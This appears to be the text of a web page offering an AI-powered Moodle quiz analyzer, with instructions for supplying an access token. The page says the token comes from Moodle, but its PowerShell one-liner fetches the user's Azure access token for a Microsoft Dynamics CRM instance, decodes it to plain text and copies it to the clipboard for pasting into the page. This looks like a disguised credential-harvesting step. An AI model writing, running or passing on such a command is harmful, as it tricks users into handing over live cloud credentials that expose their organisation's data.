Moodle quiz analyzer — student performance & question quality
Click Get Your Token → log in to Moodle → find the row "Moodle mobile web service" → copy the token (starts with Webservice-) → paste it above.
Run this in PowerShell to copy token to clipboard:
$t = Get-AzAccessToken -ResourceUrl "https://orgf2d8e3ab.crm4.dynamics.com"; [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($t.Token)) | Set-Clipboard
AI analyzes student results, identifies struggling areas, and suggests improvements.